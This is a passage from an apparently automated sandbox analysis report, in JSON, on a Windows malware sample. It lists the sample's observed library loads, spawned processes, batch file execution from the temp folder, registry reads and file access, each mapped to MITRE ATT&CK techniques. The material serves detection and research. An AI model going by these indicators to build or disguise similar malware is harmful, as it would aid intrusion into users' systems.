\"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\r2585.bat (UID: 00000000-00005056)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter WININET.DLL (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\r2908.bat (UID: 00000000-00005068)\n \"dllconf.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005392)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77430000\n \"dllconf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77430000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77430000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"dllconf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"dllconf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"dllconf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dllconf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dllconf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"\n \"dllconf.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"dllconf.exe\" with commandline \"\\\\dllconf.exe\" (UID: 00000000-00005068)\n Spawned process \"dllconf.exe\" (UID: 00000000-00005392)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2585.bat\" \"\" (UID: 00000000-00005268)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2908.bat\" \"\" (UID: 00000000-00005644)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"dllconf.exe\" with commandline \"\\\\dllconf.exe\" (UID: 00000000-00005068)\n Spawned process \"dllconf.exe\" (UID: 00000000-00005392)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2585.bat\" \"\" (UID: 00000000-00005268)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2908.bat\" \"\" (UID: 00000000-00005644)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2585.bat\" \"\" (UID: 00000000-00005268)\n Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2908.bat\" \"\" (UID: 00000000-00005644)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"dllconf.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"dllconf.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: dllconf.exe)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-189", "type": 2, "relevance": 3, "name": "Contains ability to reboot/shutdown the operating system (API string)", "description": "Found reference to API \"ExitWindowsEx\" (Indicator: \"ExitWindows\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"ExitWindowsEx\" (Indicator: \"ExitWindows\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-455", "type": 2, "relevance": 3, "name": "Contains reference to multiple windows system processes", "description": "Found strings \"update.exe,svchost.exe,services.exe,csrss.exe,winlogon.exe\" (File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"fonts\\explorer.exe\" (Indicator: \"explorer.exe\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"\\explorer.exe\" (Indicator: \"explorer.exe\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Explorer.exe,%s -shell\" (Indicator: \"explorer.exe\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" was detected as \"Microsoft visual C++ 5.0\"\n \"dllconf.exe\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\Windows\\System32\\DLLCONF.EXE\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\SECUR32.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"dllconf.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"c:\\e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"c:\\dllconf.exe\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\version.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Secur32.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\Secur32.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\SSPICLI.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\SSPICLI.DLL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe.Local\\\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2585.bat:Zone.Identifier\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\E7379A48E702C96FA733625CF8535F1A1A9C6704941224A7B5ECB18D8E0FED33.EXE.LOCAL\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2585.bat:ZONE.IDENTIFIER\"\n \"dllconf.exe\" trying to access non-existent file \"C:\\dllconf.exe.Local\\\"\n \"dllconf.exe\" trying to access non-existent file \"C:\\DLLCONF.EXE.LOCAL\"\n \"dllconf.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2908.bat:ZONE.IDENTIFIER\"\n 